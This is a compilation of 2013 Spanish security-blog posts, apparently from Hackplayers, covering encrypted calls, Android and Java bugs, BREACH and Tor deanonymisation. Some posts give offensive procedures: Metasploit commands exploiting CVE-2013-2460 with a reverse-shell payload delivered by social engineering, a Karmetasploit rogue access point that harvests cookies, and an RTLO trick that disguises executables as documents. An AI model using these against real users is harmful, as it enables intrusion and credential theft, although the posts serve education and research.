hackplayers

En la foto homenaje al gran Gila.

Considero que soy demasiado insignificante para que merezca la pena perder el tiempo interceptando mis mensajes o capturando una de mis llamadas para realizar una escucha, me siento afortunado en ese aspecto. Sin embargo no todos tienen la misma suerte y tienen que intentar evitar a toda costa que interfieran en su privacidad, en muchos casos de ello depende su libertad e incluso su vida, fijaros en lo serio e importante que es.

Y no hablamos sólo de espías o terroristas a los que acecha la NSA cuyo programa PRISM está tan de moda últimamente, ellos podrían utilizar su propia infraestructura para asegurar sus comunicaciones. Hablamos de gente de a pie que vive bajo el yugo de un régimen opresor y que tiene que apañárselas con los medios disponibles.

Afortunadamente para ellos y para el resto de personas que quieran mantener una lícita privacidad sin concesiones, existen cada vez más herramientas que ayudan a cifrar las comunicaciones impidiendo que cualquier programa gubernamental o tercero en general pueda romperla. Por ejemplo podéis echar un vistazo a la página de PRISM Break donde encontraréis numerosas alternativas libres al software privativo susceptible de colaborar con la NSA en el programa mundial de vigilancia de datos.

Pero en esta entrada vamos a centrarnos exclusivamente en la seguridad de las llamadas de voz a través de nuestros teléfonos con una herramienta de la empresa Whisper Systems: RedPhone.

Ésta aplicación jugó un rol muy importante durante la Primavera Árabe y, aunque hubo cierta controversia por el corte temporal del servicio cuando a finales de 2011 Whisper Systems fue adquirida por Twitter, poco después liberaron su código fuente y hoy en día continúan siendo una muy buena elección.

Eso sí, sólo funciona bajo Android así que lo siento por todos aquellos que tienen iPhone: el iOS de Apple se considera inseguro y además es imposible verificar si una aplicación en iOS fue compilada de su fuente original.

Redphone tiene como objetivo establecer una comunicación VoIP cifrada punto a punto (end-to-end) y utiliza el protocolo ZRTP diseñado por Phillip Zimmerman, el inventor de PGP. Si nos vamos a la Wikipedia, ZRTP se describe como una extensión del Secure Real-time Transport Protocol (SRTP) y se utiliza para el intercambio de claves Diffie-Hellman. La arquitectura de Redphone es bastante sencilla:

1. El iniciator, que es el teléfono con el cliente Redphone, contacta con el servidor master y señaliza que quiere establecer una llamada con el responder. El servidor master será el encargado del proceso de señalización y cifrado de la llamada.

2. El responder recibe una llamada cifrada y conecta con el servidor master que indica que ha recibido la señal de llamada correctamente.

3. Si el responder elige contestar la llamada, se reenvía la comunicación al servidor relay más cercano (NAT traversal).

Tenéis todo el detalle de los protocolos de señalización y cifrado en la Wiki del proyecto en Github. No obstante comentaros que el servidor no tiene acceso a las claves usadas para asegurar una llamada y por lo tanto no tiene la capacidad de descifrarla. Lo único que sabrá Whisper Systems es quién está llamando a quién y durante cuanto tiempo, pero no a lo qué se está diciendo durante la conversación. Pero si tampoco confías en los servidores de Whisper Systems tienes el código fuente, así que puedes instalarte los tuyos propios ;)

Aunque un ISP o cualquier otra entidad podría llegar a saber el origen-destino de la conversación con una excelsa monitorización de todo el tráfico y un buen sistema de correlación.

Si alguno está pensando por qué es necesario servidores es porque técnicamente no es posible que un dispositivo pueda comunicarse directamente con otro en una red móvil: necesitan un intermediario para enrutar el tráfico entre ellos.

Por otro lado la aplicación está disponible en Google Playde forma gratuita y su instalación y uso es extremadamente sencilla. Simplemente hay que instalarla en los clientes y sólo utiliza como registro el número de teléfono. Se puede llamar mediante la libreta de direcciones del teléfono (o si no estuviera el contacto marcar un * al final). Además si a quién llamas no tiene Redphone se le enviará automáticamente un mensaje con un enlace para instalarlo.

En definitiva, con Redphone podremos cifrar una comunicación VoIP fácilmente y el único coste será el del envío normal de un SMS y del uso de datos (aproximadamente 108 kb para una llamada de 3 minutos). Un tipo de herramienta fundamental para el justificable emparanoiamiento de nuestros días...

Pilar :)

Todos estamos al día en lo que va ocurriendo en Seguridad Informática, leemos los feeds (ahora sin reeader), las listas de correos, nos bajamos los últimos PDFs publicados, y seguimos en Twitter a otros compañeros de seguridad para estar informados hasta el último segundo.

Ahora gracias a Pilar Movilla en Ventanas en la red, tenemos un nuevo punto de encuentro en Internet, una radio que nos acerca un poquito más la información, las anécdotas, y las curiosidades de grandes profesionales en seguridad, -y he escuchado que también las de algún novato.- Con la comodidad de poder escucharlo en nuestro mp3, mientras vamos en el coche a trabajar o nos desplazamos en transporte público.

¿Qué vamos a poder encontrar?

Podremos conocer curiosidades, como que Chema Alonso no pensaba dedicarse a la seguridad informática.

Lorenzo Martinez, aguantando la risa, mientras nos cuenta la experiencia de un usuario con problemas de red, y un cable “pillado” con una puerta.

César Lorenzana, del Grupo de Delitos Telemáticos de la guardia civil, hablando de seguridad desde “el otro lado”.

La voz de Wardog, aprovechando para seguir haciéndonos reír.

Mi admirado, y respetado Angelucho, transmitiendo seguridad informática, a un nivel, entendible por todo el mundo. Sabiendo hacerse comprender.

Juan Antonio Calles y Pablo González, acercando al público Flu Project, y algunos casos en los que han participado.

Jaime Sanchez, Pablo San Emeterio, Oscar Calvo y Juan Carlos García, destripando la red. Cuatro hackers de altura, dando su visión de la red.

En el último programa he tenido el honor de participar, con unos compañeros estupendos ellos son: Mónica Boto, Óscar Sánchez, Roberto García, y el que escribe, Adrián Pulido. En este programa estupendo que todo el mundo debe descargar, hablamos la nueva hornada, sobre los retos que nos encontramos.

¡Y mucho más! Aquí tenéis los podcast, para disfrutar durante horas.

Aprovecho la otra ventana que ahora me presta Vicente, para dar las gracias a Pilar por hacer el día tan divertido, prestarse a entrevistarnos, y tratarnos genial. A todas las personas que están detrás del programa de radio “tras las cámaras”. Y sin lugar a duda, a mi padre virtual, Angelucho, que soy consciente todo lo que hace por mi // nosotros.

WiNSoCk

Este módulo de Metasploit abusa el método inseguro invoke() de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.

Explotando CVE-2013-2460 con metasploit:

// Cargamos el módulo
msf > use exploit/multi/browser/java_jre17_provider_skeleton

// Cargamos el payload para el meterpreter
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp

//
msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]

//
msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]

//
msf exploit(java_jre17_provider_skeleton) > set uripath /

//
msf exploit(java_jre17_provider_skeleton) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Contribución gracias a Stuxnet Hack

Sin duda una de las noticias del día es que han descubierto una vulnerabilidad que puede suponer que el 99% de los dispositivos Android sean vulnerables. Sus descubridores han sido los investigadores de Bluebox Security y se trata de la posibilidad de modificar el código de un APK sin romper la firma criptográfica de la aplicación. Todavía no se sabe bién cómo, si con una clave maestra u otra técnica, pero el detalle de la vulnerabilidad y cómo explotarlo serán presentados en la conferencia Black Hat USA 2013 del próximo mes.

El bug fue reportado a Android en febrero de este año (8219321) y afecta a todas las versiones desde Android 1.6 Donut, es decir, a todas desde hace 4 años.

Si bien parece que algunos fabricantes ya están actualizando sus firmwares como el del Samsung Galaxy S4, hay otros que todavía tienen una asignatura pendiente como ~~increiblemente~~ los Nexus de Google. Por otro lado muchos dispositivos permanecerán vulnerables porque han alcanzado su end-of-life y no son soportados, por lo que el asunto se presenta serio.

La única nota positiva es que Google desde hace tiempo ya no permite actualizar las aplicaciones de su Play Store fuera de sus mecanimos de actualización, por lo que instalar aplicaciones desde el mercado aplicaciones "oficial" puede considerarse seguro. La única excepción serían todos aquellos en los que los gobiernos autoritarios no permiten directamente acceeder al Play Store u otras que tienen cierto gusto por aplicaciones que no son permitidad por Google, como aquellas con contenido pornográfico...

Fuentes:
900 million Android phones vulnerable to hacking from 'master key'
Uncovering Android Master Key That Makes 99% of Devices Vulnerable
Bluebox reveals Android security hole, may affect 99 percent of devices
Here’s why most users won’t be affected by the latest Android flaw
Vulnerability allows attackers to modify Android apps without breaking their signatures

Increíble el vídeo de presentación de la conferencia Javazone que tendrá lugar los próximos 11 y 12 de septiembre en Oslo Spektrum:

Karmetasploit es una interesante función dentro de Metasploit que sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar información y llevar a cabo ataques de navegador contra los clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente Karmetasploit intentará ejecutar todos los exploits sobre la máquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión de meterpreter.

Empezaremos descargando Karmetasploit y luego instalaremos dhcpd3-server:

sudo apt-get install isc-dhcp-server

Una ves instalado el servidor DHCP procederemos a configurarlo, quedando de la siguiente manera:

#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}

Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.

Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0:

airmon-ng start wlan0

Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up

Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0

Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0

Ahora iniciamos mestasploit con karma.

msfconsole -r karma.rc

Y al iniciar karmetasploit les aparecerá:

Contribución gracias a Stuxnet Hack

La noche se presenta "calentita" en las redes sociales con la noticia de que ha sido filtrada la contabilidad del PP desde 1990 a 2011. Un breve texto publicado en anonyourvoice.com proclamaba la publicación "Cables contables PPgoteras Lo que debería ser público, será público" y adjuntaba un enlace por cada uno de los años contables, recordemos unas cuentas que el PP negó tener ante el juez Ruz... Actualmente estos enlaces ya no se encuentran disponibles en Anonyourvoice.com, si bien existen numerosos mirrors que van creciendo como la pólvora.

#WeNeedMoreHackers es un hashtag *exageradamente sensacionalista* que pide ayuda para convertir los numerosos PDF escaneados en texto legible para un mejor análisis por la inteligencia colectiva, un llamamiento para un crowdworking a lo bestia. Por otro lado #CuentasDelPP va camino de convertirse en trending topic en España.

Mientras muchos señalan como autor de esta filtración a un misterioso hacker, algunos hablan de Anonymous y otros apuntan a una distracción orquestada para tapar el tema de los Convenios colectivos. El portal Anonyourvoice.com donde se filtró originalmente la información utiliza ZeroBin, una herramienta de código abierto de la que ya hablamos hace tiempo en el blog: se trata de un "pastebin" online donde el texto pegado se cifra con AES256 en el lado del cliente (navegador) y luego se envía al servidor, y se puede acceder por otros usuarios sólo si se les da la dirección URL completa que contiene la clave de cifrado. Por lo tanto no se podrá ni habrá control de contenidos ni censura por lo que detectar el origen por esta plataforma es harto complicado...

La pregunta de quién ha sido realmente y por qué (y por qué ahora) queda por tanto en el aire... Oh wait, espera hace 20 horas publicaron también en Pastebin (http://pastebin.com/u1Dk7jz4), ¿y los metadatos, volaron los metadatos? ¿son realmente verazes los documentos filtrados? Sin duda, mucha diversión para un analista... ;)

Enlaces y noticias de interés:
Un hacker ha publicado la contabilidad del PP desde el año 1990 hasta el 2011
Un hacker publica la contabilidad del PP de 1990 a 2011
La contabilidad del PP es publicada por un hacker
Anonymous publica la contabilidad del PP desde 1990 hasta 2011
Los cables contables del PP. ¿Chuletón para distraer la atención pública?
Se filtran las #CuentasDelPP – Ahora hay que analizarlas ¿nos ayudas?
...
... y creciendo...

IT Masters y la Universidad Charles Sturt están ofreciendo de forma gratuita un curso on-line para preparar la certificación CISSP (Certified Information Systems Security Professional) similar a otros que pueden llegar a costar hasta 3000 euros.

El curso se desarrolla durante seis semanas a partir del próximo miércoles 17 de julio, con conferencias a través de webinars semanales de 90 minutos de 12:30-14:00 hora AEST cada miércoles. Además, a los estudiantes se les pide que hagan un total de 10 a 12 horas de estudio entre los webinars.

Aunque se dispondrá de una gran variedad de materiales de referencia online se recomienda adquirir la Guía Oficial (ISC)2 de CISSP CBK (63,40 en Amazon). El curso culminará con un examen de certificación CISSP práctico: un examen "a libro abierto" programado que los estudiantes podrán hacer desde su propia casa. Adicionalemente los estudiantes que completen el curso y consigan la certificación CISSP obtendrán además un crédito para el Master de Seguridad SI o el Master de Administración (IT-Seguridad) de la Universidad Charles Sturt.

No obstante avisaros de que el propio CEO de IT Masters, Martin Hale, dijo que al término del curso algunos estudiantes estarán dispuestos a hacer el examen de certificación CISSP pero que la mayoría tendrá que reforzar sus estudios: "El examen de certificación CISSP es uno de los más duros de la industria, razón de por qué es tan apreciada por los empleadores. 250 preguntas durante más de seis horas y la necesidad de obtener al menos el 70% para aprobar hacen necesario asegurarse de estar preparado".

El Masters Curso de Certificación CISSP IT está dirigido a:

- profesionales de la seguridad que están interesados en la comprensión de los conceptos tratados en el examen CISSP
- gerentes que tal vez no quieran obtener la certificación CISSP, pero quieren comprender las áreas críticas de la red y el sistema de seguridad
- administradores de red que desean entender las aplicaciones pragmáticas de los 10 dominios del conocimiento de CISSP
- profesionales de la seguridad y administradores que busquen maneras prácticas de aplicar los 10 dominios de conocimiento del CISSP en su trabajo actual.

Para más información:

www.itmasters.edu.au/free-short-course-cissp-security
www.itmasters.edu.au

Fuente: $3000 cyber security course for free

La semana pasada hablábamos del bug 8219321 de Android (master keys) que permitía modificar un apk sin romper su firma criptográfica.

Esto es debido a que un Mapen Android/Java sólo puede devolver un único objeto para una clave dada, por lo que el truco está en crear dos entradas con el mismo nombre de forma que la función getInputStream sólo pueda verificar el correcto.

Os recomiendo echar un vistazo al detalle técnico de Al Sutton y a la PoC de Pau Oliva (¡geniales!).

Afortunadamente ya están corrijiendo el problema que afecta a unos 900 millones de dispositivos con Android.

Google ya ha implementado la solución en el código base del Galaxy S4 y HTC One a partir de Android 4.2.2 aunque el resto de dispositivos tendrán que esperar.

Mejor pinta la cosa para los que utilizamos CyanogenMod que añade el parche en el código ZipFile.java y ZipFileTest.java de la última nightly build (ya sabéis, aquella que incluye todos los cambios realizados durante el día).
El parche simplemente añade una condición para comprobar nombres duplicados en ZipFile.java y ZipFileTest.java:

diff --git a/luni/src/main/java/java/util/zip/ZipFile.java b/luni/src/main/java/
index 6ecd489..7b19cc9 100644
--- a/luni/src/main/java/java/util/zip/ZipFile.java
+++ b/luni/src/main/java/java/util/zip/ZipFile.java
@@ -363,7 +363,9 @@ public class ZipFile implements ZipConstants {
         byte[] hdrBuf = new byte[CENHDR]; // Reuse the same buffer for each ent
         for (int i = 0; i < numEntries; ++i) {
             ZipEntry newEntry = new ZipEntry(hdrBuf, bin);
-            mEntries.put(newEntry.getName(), newEntry);
+            if (mEntries.put(newEntry.getName(), newEntry) != null) {
+                throw new ZipException("Duplicate entries: file may have been tampered with");
+            }
         }
     }

Y lo bueno es que a partir de la versión 10 de CyanogenMod es posible actualizar la ROM a través de una actualización OTA (Over The Air), bastará con acceder a Ajustes, Información del teléfono, Actualizaciones CyanogenMod:

Por último podemos comprobar que nuestro dispositivo ya no es vulnerable generando el apk con el exploit de Pau, probando a instalar un apk de ejemplo de Fuzion24 o mediante la aplicación gratuita Bluebox Security Scanner:

Se acercan las vacaciones y llevar un buen libro puede ser un gran entretenimiento para esos días de tumbona en la playita. Ando viendo algunos títulos y este parece interesante. Worm: The First Digital World War es un libro del autor de Black Hawk derribado (de la que se basó la peli de Ridley Scott) y viene a contarnos la batalla entre quienes están decididos a explotar Internet y los que tienen como cometido protegerla - la guerra que tiene lugar literalmente bajo nuestros dedos...

El gusano Conficker infectó su primer equipo en noviembre de 2008 y en un mes se había infiltrado en 1,5 millones de ordenadores de 195 países. Los bancos, las compañías de telecomunicaciones y las redes críticas de algunos gobiernos (incluido el Parlamento británico y el ejército francés y alemán) se infectaron. Nadie había visto nunca nada igual. En enero de 2009, el gusano estaba escondido en al menos ocho millones de ordenadores y la botnet de ordenadores conectados que había creado era lo suficientemente grande que uno de sus ataques podría bloquear el mundo. Esta es la apasionante historia del grupo de hackers, investigaciones, empresarios millonarios de Internet y expertos en seguridad informática que se unieron para defender Internet del gusano Conficker: la historia de la primera guerra mundial digital.

Ver libro en Amazon

Sí amigos, el sistema operativo de código abierto de Google incorpora código de la NSA desde 2011, si bien no se trata de un "backdoor" si no de algunas mejoras de seguridad para Android según Bloomberg para "aislar las aplicaciones para evitar que hackers y los comerciantes tengan acceso a los datos personales o corporativos almacenados en un dispositivo".

El portavoz de Google Gina Scigliano confirmó que Android ya está incorporando código de la NSA que ha estado trabajando en una rama de su proyecto Linux SE (Security-Enhanced), pero hizo hincapié en el hecho de que, "todo el código de Android y de sus contribuyentes está a disposición del público para su consulta en source.android.com."

Sinceramente no creo que la NSA se arriesgue a introducir código en el SO para el espionaje... demasiadas miradas atentas y más aún después del escándalo de PRISM. Sin embargo y como he leído en cierto comentario, el hardware de un smartphone carga en tiempo de ejecución muchas librerías que no liberan el código a efectos prácticos y, por ejemplo, este hardware se comunica con puntos de acceso y repetidores para recepción y tono de llamadas. Estas tareas incluyen actualizaciones y comandos como el pasivo "turn mic on". La suma de la interacción entre el hardware de un dispositivo y la red telefónica es más interesante para la NSA...

La semana pasada tuve la oportunidad de probar la versión alpha de Grampus, una herramienta multiplataforma de extracción de metadatos y footprinting, algo así como una FOCA en python y de código abierto. Desde haces meses The_Pr0ph3t y SankoSK y otros desarrolladores como sniferl4bs, don_once, OverxFlow o Kodeinfect han estado trabajando duramente para por fin publicar la versión beta. Os recomiendo echarle un vistazo y colaborar en el betatesting y mejora de esta prometedora herramienta:

Grampus Project nace para todos aquellos usuarios que necesitan automatizar sus procesos en auditorias web. Como sabemos la recopilación de información a la hora de realizar un ataque a un objetivo es esencial y a veces este proceso puede ser muy largo y pesado.

Fear the FOCA, de Chema Alonso y su equipo, cubre las necesidades de automatización que necesitamos a la hora del proceso de Fingerprinting y la extracción y el análisis de metadatos lo que no cubre es algo para muchos esencial, la cómoda multiplataforma.

Muchos somos usuarios Linux y nos resulta complicado tener que rompernos el coco para emularlo con WINE o incluso virtualizarlo en una maquina virtual con entorno Windows...

Es por todo esto que nace Grampus Project , para poder cubrir nuestras necesidades.

El proyecto se divide de esta manera :
- Forensic Grampus
- Anti-Forensic Grampus
- Grampus
- Anti Grampus

Aquí es donde entraremos ya en detalles ya que explicaremos las características de cada uno...

- Forensic Grampus :
Forensic Grampus es una herramienta forense que pretende extraer y analizar los metadatos encontrados en documentos, imagenes , archivos, aplicaciones...

Esta totalmente programado en Python por lo que es la perfecta alternativa multiplataforma para Forensic FOCA superando a esta con creces en cuanto a extensiones soportadas.

(Para ver las extensiones soportadas puedes visitar nuestro proyecto en Bitbucket en el que trataremos de subir más información acerca de esto ya que puede variar a medida que vamos programando.)

- Anti-Forensic Grampus :
Anti Forensic Grampus es una herramienta ANTI forense que pretende eliminar o modificar aquellos metadatos encontrados en documentos, imagenes, archivos, aplicaciones...
Esta totalmente programada en Python por lo que es una buena alternativa a Metashield Protector proporcionando protección contra las mismas extensiones que podemos analizar en Forensic Grampus.

- Grampus :
Grampus es una herramienta para la automatización de procesos fingerprinting en los trabajos de auditoria web sumandole a esto la posibilidad de extraer y analizar los documentos públicos encontrados en la propia página a la que se le realiza la auditoria convirtiendose así en la alternativa multiplataforma Perfecta para FOCA de Chema Alonso y su equipo.

- Anti - Grampus :
Anti Grampus es una herramienta creada para evitar exponer datos o credenciales que puedan ser de utilidad en ese proceso de fingerprinting volviendo así a nuestro sitio más seguro.

Esta totalmente programado en Python así como las otras 3 herramientas y a diferencia de las demas esta surge como contramedida y no como una alternativa.

Descarga del software : https://bitbucket.org/grampusteam/grampus/downloads/Grampus%20Beta.zip

User-guide : https://www.mediafire.com/view/ocz5j3hxex6br41/userguide_grampus.pdf

En nuestro último reto de esteganografía (Reto 17: Toulouse) queríamos utilizar una técnica de Martin Fiedler que nos pareció muy pero que muy interesante: la posibilidad de ocultar volúmenes cifrados de Truecrypt dentro de vídeos en formato QuickTime/MP4.
Pensarlo un momento, está muy bien tener un volumen cifrado en el disco pero está aún mejor que además no se encuentre a la vista de miradas indiscretas... ;)

Una opción es crear un volumen oculto con Truecrypt pero es algo arriesgado si tenemos en cuenta la facilidad con la que podemos llegar a sobrescribirlo. Otra es utilizar nombres de ficheros como pagefile.sys o hiberfil.sys aunque cantaría demasiado su presencia en discos extraíbles. Pero hay otra mejor: hoy en día los vídeos están en todas partes y ocupan gigas y gigas con la llegada de la alta definición. Además gracias a los encoders actuales por mucho bitrate que tenga un video con respecto a otro es dificil de apreciar la diferencia de calidad, por no hablar de detectar un bloque de datos aleatorios dentro de un binario... ¡por todo eso los vídeos son una excelente alternativa!

La técnica en cuestión consiste en mantener más o menos la estructura del fichero de tal forma que sea usable por las dos aplicaciones: TrueCrypt y el reproductor de vídeo al uso. Para ello se pone el mdat (media data) justo después del final del volumen de TrueCrypt seguido de la cabecera moov (media header). Entonces se genera un nuevo mdat que abarca tanto el volumen TrueCrypt como los media data reales. Como se modifican los offsets durante este proceso es necesario ajustar la tabla, algo que es posible y manejable. Para conseguir la máxima credibilidad, se copian los primeros kilobytes del mdat original al principio del archivo. De esta manera, el archivo se ve inocuo incluso cuando se observa en un editor hexadecimal. Todo esto se explica en detalle en el post del autor y se ve más claramente en su gráfico:

Respecto a la detección de la información oculta podía hacerse 1/ comparando el vídeo con el de Youtube de Nicky Romero, 2/ monitorizando el bitrate y comprobando el tamaño del archivo o 3/ haciendo un análisis en profundidad de los datos del mdat (offsets o repeticiones de los primeros 64k). Tengo pendiente el desarrollo de una herramienta que automatice la segunda opción...

Además podréis descargar un script en Python 2.x para generar el híbrido TrueCrypt/QuickTime, que es el que hemos utilizado en nuestro reto.

El vídeo como podéis ver puede reproducirse y si lo intentamos montar con Truecrypt con la contraseña TOULOUSE (tan evidente sí, porque no queríamos que perdierais tiempo con un ataque de diccionario)...

reto17# truecrypt --non-interactive --password=TOULOUSE stego.mp4 volume
reto17# head volume/CABLE_245612.txt
UNCLAS SECTION 01 OF 04 MADRID 000086

SENSITIVE
SIPDIS

STATE FOR EUR/WE, EEB/TPP/IPE, EEB/IFD/OIA, EEB/TRA/AN
STATE PASS USTR FOR D.WEINER
COMMERCE FOR 4212/DON CALVERT
ENERGY FOR PIA/K.BALLOU AND EERE/D.BIRNS
TREASURY FOR OIA/OEE/R.JOHNSTON AND OTP/M.CORWIN

voilà! accedemos al contenido del mismo, en este caso un cable del ex ministro Miguel Sebastián.

Agradecimientos y ganadores:

Lo primero excusarnos por la confusión de cuál era el video a analizar (para nosotros el "original" porque el que se reproducía incrustado era una conversión de Vimeo) y disculpas personalizadas a kami y t0n1 de hacktracking porque justo estuve de vacaciones y no avisé que el reto fue resuelto unos días antes por nuestro amigo Daniel Correa de Seguridad Colombiana. No obstante ellos no se apoyaron en ninguna pista y para mí son también justos ganadores, por lo que espero me permitáis compartir créditos en nuestro humilde "hall de la fama".

Por último daros las gracias a todos aquellos que hayáis invertido algo de tiempo en intentar resolver el reto. Sé que muchos sois anónimos y aunque no aparecéis en los títulos estáis ahí, intentando aprender y divertiros con nosotros. ¡Hasta el próximo!

Hoy en día podemos ~~querer~~ usar Google para evadir puntualmente un molesto paywall u ocultar simplemente nuestra IP para cualquier pequeña diablura. A continuación os dejo una serie de servicios de Goliat para que David pueda hacer uso y disfrute para sus maléficos propósitos...

1. Google Translate

Es el "proxy Google" más popular y muestra la páginas como las originales, aceptando imágenes y CSS. Simplemente pon como destino (parámetro tl) el mismo lenguaje de la página original y como origen (sl) cualquier otro:

http://translate.google.com/translate?sl=ja&tl=es&u=http://hackplayers.com/

2. Google Mobilizer
Aunque Google ha discontinuado este servicio en el dominio .com todavía esta disponible en otros como .ie o .es. En este caso no se cargan hojas de estilo pero es ideal para la carga rápida y lectura de grandes textos. Además para mejorar la velocidad permite desactivar la carga de imágenes:

http://www.google.es/gwt/x?u=http://hackplayers.com

3. Google Modules

Gmodules.com es normalmente utilizado para alojar gadgets pero puede ser utilizado como un proxy que además permite descargar archivos (como PDFs, .MP4 videos, etc.) además de visualizar normalmente páginas web:

http://www.gmodules.com/ig/proxy?url=http://hackplayers.com

4. Google Caché

Otra forma ver el contenido de una página web es acceder al caché de los servidores de Google. Eso sí normalmente se trata de una captura de pantalla de la página tal como esta se mostraba un día atrás y es posible que la página haya sufrido modificaciones durante ese tiempo:

http://webcache.googleusercontent.com/search?q=cache:www.hackplayers.com

5. Servidor proxy propio

Finalmente también puedes crear tu propio servidor proxy usando este Google Script o el más avanzado Google App Engine.

Fuente: Use Google as a Proxy Server to Bypass Paywalls, Download Files

Estaba leyendo acerca de una nueva familia de malware que puede propagarse tanto en Windows como en OS X. A parte de eso, me llamó también la atención que Janicab.A, como se conoce al troyano, también utiliza un viejo truco para engañar al usuario: el carácter especial Unicode U+202E conocido como una anulación de derecha a izquierda para hacer que el archivo malicioso aparezca como un documento PDF en lugar de un archivo ejecutable potencialmente peligroso.

Nada más fácil de realizarse. Por ejemplo, imagina que nuestro server es cmd.exe:

1. Abrimos el mapa de caracteres de Windows (inicio, ejecutar, charmap)

2. Buscamos y copiamos el carácter Unicode U+202E. Fijaros que en la parte inferior izquierda se muestra el valor ASCII de los caracteres.

3. Pegamos (Ctrl+V) el carácter justo antes del punto de la extensión: cmd[[Unicode U+202E]].exe

4. Escribimos la extensión que queremos pero al revés, por ejemplo, si queremos "doc" escribiremos "cod" o si queremos "pdf" escribiremos "fdp".

Y al final el resultado visual será cmdexe.doc:

Por último para "endulzar" el vector de infección simplemente tendríamos que cambiar el icono con reshack u otro y utilizar un nombre algo más disimulado teniendo en cuenta que el "exe" o la extensión original debe permanecer. Por ejemplo:

EE.UU. ha presentado a Irlanda una solicitud de extradición de Eric Eoin Marques, un irlandés de 28 años dueño del ISP Freedom Hosting y, según el FBI, "el mayor distribuidor de pornografía infantil del planeta".

Freedom Hosting es el proveedor de hosting que más sitios .onion tiene dentro de la red de Tor y desde hace bastante tiempo se le acusa de alojar pornografía infantil. Ahora el FBI ha sido capaz de identificar a Eric pero¿cómo ha sido capaz de trazarlo a través de Tor?

Como todos sabemos el diseño de la red de Tor asegura que el usuario no pueda saber dónde se localiza el servidor y que el servidor no pueda saber la dirección IP del usuario... al menos que se inserte código de rastreo o tracking en las páginas web del servidor...

Esto es precisamente lo que se ha descubierto el algunos sitios del proveedor Freedom Hosting, concretamente código Javascript para explotar un bug de la versión Firefox 17 ESR (que es el que se basa el Tor Browser oficial) y que permite obtener la IP real del usuario que navega a través de Tor (después envía la información a una IP en Reston, Virginia) a parte de cargar un payload para instalar malware en el equipo de la víctima. Podéis ver un análisis en detalle aquí.

Precisamente se especula que este código haya podido ser generado por el propio FBI lo que le ha podido facilitarles una gran victoria contra la pederastia aunque a su vez generar muchas suspicacias al"desanonimizar" a otros usuarios que utilizan la red Tor con mejores fines. ¿El fin justifica los medios?

Fuentes:
Hidden Services, Current Events, and Freedom Hosting
Almost Half of TOR sites compromised by FBI [Exclusive details]

BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) es una nueva herramienta que utiliza una técnica mediante la cual es posible extraer tokens de logins, IDs de sesión y otra información sensible a partir de tráfico web cifrado SSL/TLS y en ¡sólo 30 segundos!.

Esto significa que podría permitir a un atacante descifrar fácilmente un canal HTTPS de un banco o de un sitio de venta online }:)

Fue presentada en la última conferencia Black Hat y se aprovecha varias vulnerabilidades de forma similar a lo que hacía CRIME con deflate, es decir, ataca al algoritmo de compresión aunque en las respuestas HTTP. Eso sí, como comentamos la información sensible ha de estar en las respuestas HTTP, el servidor por supuesto ha de utilizar compresión HTTP y el exploit requiere que la víctima visite primero un enlace malicioso.

Más información en:http://breachattack.com
Paper: http://www.iacr.org/cryptodb/archive/2002/FSE/3091/3091.pdf
Presentación: http://breachattack.com/resources/BREACH%20-%20BH%202013%20-%20PRESENTATION.pdf
Demo:

Tortilla es una herramienta de CrowdStrike que permite a los usuarios enrutar todo el tráfico TCP/IP de una máquina virtual a través de Tor de una forma segura y transparente.

Funciona en el sistema anfitrión bajo Windows XP y posteriores en versiones de 32 y 64 bits y es de código abierto, es decir, podemos revisarla y compilar nosotros mismos el proyecto de Visual Studio (podéis encontrar las instrucciones en el readme.txt).

Si optamos por utilizar directamente el binario decir que está firmado con un certificado de prueba y que por lo tanto primero tendremos que configurar nuestro sistema operativo (si es Vista o superior) para que acepte el correspondiente driver en modo kernel. De lo contrario recibiremos el siguiente mensaje:

Para solucionarlo tendremos que abrir una consola (cmd.exe) con privilegios de administrador, ejecutar el siguiente comando y reiniciar el equipo:

Bcdedit.exe -set TESTSIGNING ON

Como veréis, al iniciar sesión habremos arrancado Windows en "modo de prueba". Ahora lanzamos Tor y nos aseguramos que el fichero tortilla.ini tiene configurado correctamente el puerto:

TorClientIpAddress = 127.0.0.1
TorClientTcpPort = 9151

Después ejecutamos tortilla.exe para instalar su adaptador e iniciar el cliente:

